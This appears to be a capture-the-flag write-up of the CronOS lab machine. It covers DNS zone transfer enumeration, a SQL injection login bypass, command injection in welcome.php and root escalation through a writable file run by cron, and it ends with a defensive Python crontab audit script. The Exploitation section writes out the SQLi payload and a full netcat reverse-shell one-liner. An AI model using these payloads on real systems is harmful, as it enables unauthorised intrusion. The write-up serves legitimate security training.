SYNOPSIS
CronOS focuses mainly on different vectors for enumeration and also emphasises the risks
associated with adding world-writable files to the root crontab. This machine also includes an
introductory-level SQL injection vulnerability.
Enumeration
Nmap
Nmap reveals an OpenSSH server, a DNS server and an Apache server. Attempting to view the
website reveals only the default Apache page.
Dig
Although the initial domain name must be guessed (cronos.htb), it is possible to enumerate the
remaining subdomains by doing a zone transfer. This can be accomplished with the command
dig axfr @10.10.10.13 cronos.htb after adding cronos.htb to the /etc/hosts file.
After adding admin.cronos.htb to the /etc/hosts file and browsing to it, an administrator login
page is presented.
Exploitation
Login
After some trial and error, it appears that the Username field is vulnerable to SQL injection. By
commenting out the rest of the statement with the username admin'-- - the login form is
bypassed.
Welcome
It does not take long to figure out that the welcome.php page is vulnerable to command
injection. Many different methods work here; the simplest is likely to use a semicolon
to append additional commands. However, script execution is stopped after the traceroute is run.
By intercepting the response in Burp Suite, it is possible to modify the command entirely.
After removing the host variable, command injection is now trivial. Replace traceroute with the
desired command and send the request. Note that URL encoding the command is required in
some cases. Use the command rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LAB IP>
<PORT>| >/tmp/f to connect to a local nc listener, which can be started by using the command nc
-nvlp <PORT>.
Privilege Escalation
LinEnum: https://github.com/rebootuser/LinEnum
Running LinEnum generates a fairly large list of information. One thing that stands out is the root
crontab, which runs the schedule() function in /var/www/laravel/app/console/Kernel.php.
Modifying the function allows for command execution as root by the scheduler system.
This can be used to modify other files to simplify obtaining a root shell. In this case, however,
obtaining the flag is all that is required.
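The check below is an added example, not part of the original write-up: it audits a root crontab for the weakness described above by flagging every referenced file, or parent directory, that a non-root user can modify. The crontab line is a constructed sample, and the function names and the extra_paths parameter (for files a job loads indirectly, such as Kernel.php) are assumptions of this example.

```python
import shlex
import stat
from pathlib import Path

def cron_commands(crontab_text):
    """Yield the command of each job in a user-format crontab (`crontab -l`)."""
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        special = line.startswith("@")          # @reboot, @daily, ...
        fields = line.split(None, 1 if special else 5)
        if len(fields) == (2 if special else 6):  # skips NAME=value lines
            yield fields[-1]

def risky(path, trusted_uids):
    """Return why an untrusted user could modify path, or None if they cannot."""
    st = path.stat()
    if not (stat.S_ISREG(st.st_mode) or stat.S_ISDIR(st.st_mode)):
        return None                              # ignore /dev/null and similar
    if st.st_uid not in trusted_uids:
        return f"owned by uid {st.st_uid}"
    # In a sticky directory (e.g. /tmp) only the owner can replace an entry.
    sticky = stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX
    if st.st_mode & stat.S_IWOTH and not sticky:
        return "world-writable"
    if st.st_mode & stat.S_IWGRP and not sticky:
        return "group-writable"
    return None

def audit(crontab_text, extra_paths=(), trusted_uids=frozenset({0})):
    """Map each risky file or ancestor directory to the reason it is risky."""
    targets = [Path(p) for p in extra_paths]
    for cmd in cron_commands(crontab_text):
        targets += [Path(t) for t in shlex.split(cmd) if t.startswith("/")]
    findings = {}
    for target in targets:
        for p in (target, *target.parents):     # a writable parent allows replacement
            if p.exists() and (reason := risky(p, trusted_uids)):
                findings[str(p)] = reason
    return findings

if __name__ == "__main__":
    # Constructed sample crontab; the Kernel.php path is the one named above.
    sample = "* * * * * php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1\n"
    deps = ["/var/www/laravel/app/console/Kernel.php"]
    for path, reason in audit(sample, extra_paths=deps).items():
        print(f"{path}: {reason}")
```

Because the crontab line names only the entry script, files it loads must be passed through extra_paths or they are not inspected.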